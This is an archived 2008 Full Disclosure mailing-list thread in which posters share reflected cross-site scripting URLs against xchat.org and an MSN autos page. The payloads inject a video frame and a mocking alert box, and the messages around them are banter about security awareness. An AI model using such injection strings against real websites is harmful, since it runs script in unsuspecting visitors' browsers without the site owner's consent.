Full Disclosure mailing list archives
Re: XSS in XChat.org
From: "Thomas Pollet" <thomas.pollet () gmail com>
Date: Sat, 19 Apr 2008 20:15:17 +0200
http://autotrader.autos.msn.com/fyc/index.jsp?hide_nav=true&page=atcPartner&address=&year=&make=&model=&certified=&distance=25&search_type=both&LNX=MSNATMSNBCCLASSFYC');%7D%7Dalert('n3td3v%20sucks');%20function%20vvv()%7B%20if%20(0==0)%20%7Bvar%20ho=('&icid=autos_msnbc_2&num_records=25&h000=n000'%22%3E/ On 19/04/2008, n3td3v <xploitable () gmail com> wrote:
On Sat, Apr 19, 2008 at 4:06 AM, Steve Cooperman <worried () gmail com> wrote:http://xchat.org/cgi-bin/checkupdate.pl?version=2.8.8%22%3E%3Cframe%20src=%22http://youtube.com/watch?v=oHg5SJYRHA0-- Love, Steve CoopermanI've noticed an increase in web application stuff on the list since April 15th. Please only post these on May 1st... it will look better if the list is full of xss for one day...and send out a bigger message to the powers that be who don't take web application security seriously enough. Btw, I see what you did there with the e-mail address, nice. All the best, n3td3v Web Application Security Awareness Day http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061507.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS in XChat.org Steve Cooperman (Apr 18)
- Re: XSS in XChat.org n3td3v (Apr 19)
- Re: XSS in XChat.org Thomas Pollet (Apr 19)
- Re: XSS in XChat.org n3td3v (Apr 19)